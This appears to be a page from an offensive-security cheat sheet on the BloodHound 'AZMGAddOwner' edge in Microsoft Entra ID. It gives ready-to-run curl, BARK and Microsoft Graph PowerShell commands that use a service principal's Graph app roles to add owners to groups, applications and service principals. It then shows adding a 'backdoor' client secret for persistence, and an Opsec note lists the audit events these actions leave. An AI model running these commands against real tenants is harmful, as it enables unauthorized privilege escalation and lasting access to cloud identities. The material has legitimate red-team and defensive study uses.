🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🩸 BloodHound / AZMGAddOwner

AZMGAddOwner

The source service principal holds MS Graph app roles that allow it to add owners to groups, applications, or service principals via the MS Graph API.

Applies to: AZServicePrincipal β†’ AZGroup / AZApplication / AZServicePrincipal

Linux Abuse

Get client credentials token

TOKEN=$(curl -s -X POST \
  "https://login.microsoftonline.com/<tenant-id>/oauth2/v2.0/token" \
  -d "client_id=<app-id>&client_secret=<secret>&scope=https://graph.microsoft.com/.default&grant_type=client_credentials" \
  | jq -r '.access_token')

Add owner to group (Graph API)

curl -s -X POST "https://graph.microsoft.com/v1.0/groups/<target-group-id>/owners/\$ref" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/<object-id>\"}"

Add owner to application (Graph API)

curl -s -X POST "https://graph.microsoft.com/v1.0/applications/<object-id>/owners/\$ref" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/<object-id>\"}"

Add owner to service principal (Graph API)

curl -s -X POST "https://graph.microsoft.com/v1.0/servicePrincipals/<object-id>/owners/\$ref" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/<object-id>\"}"

Windows Abuse

BARK β€” add owner to Service Principal

$MGToken = Get-MSGraphTokenWithClientCredentials `
  -ClientID "34c7f844-b6d7-47f3-b1b8-720e0ecba49c" `
  -ClientSecret "asdf..." `
  -TenantName "contoso.onmicrosoft.com"

New-ServicePrincipalOwner `
  -ServicePrincipalObjectId "<object-id>" `
  -NewOwnerObjectId "<object-id>" `
  -Token $MGToken.access_token

BARK β€” add owner to App Registration

New-AppOwner `
  -AppObjectId "<object-id>" `
  -NewOwnerObjectId "<object-id>" `
  -Token $MGToken.access_token

BARK β€” add owner to Group

New-GroupOwner `
  -GroupObjectId "<target-group-id>" `
  -NewOwnerObjectId "<object-id>" `
  -Token $MGToken.access_token

Microsoft.Graph PowerShell

Connect-MgGraph -AccessToken <access-token>

# Group owner
New-MgGroupOwner -GroupId <target-group-id> -DirectoryObjectId <object-id>

# Application owner
New-MgApplicationOwner -ApplicationId <object-id> -DirectoryObjectId <object-id>

# Service principal owner
New-MgServicePrincipalOwner -ServicePrincipalId <object-id> -DirectoryObjectId <object-id>

Post-Ownership Escalation

Once owner of an app registration, add a secret to impersonate the SP:

Add-MgApplicationPassword -ApplicationId <object-id> `
  -PasswordCredential @{DisplayName = "backdoor"}

Opsec

  • Entra ID audit logs record every ownership addition: actor, target object, new owner, timestamp.
  • Event name: "Add owner to application" / "Add owner to service principal" / "Add owner to group."
  • Owning an app registration enables client secret addition β€” a second distinct audit event.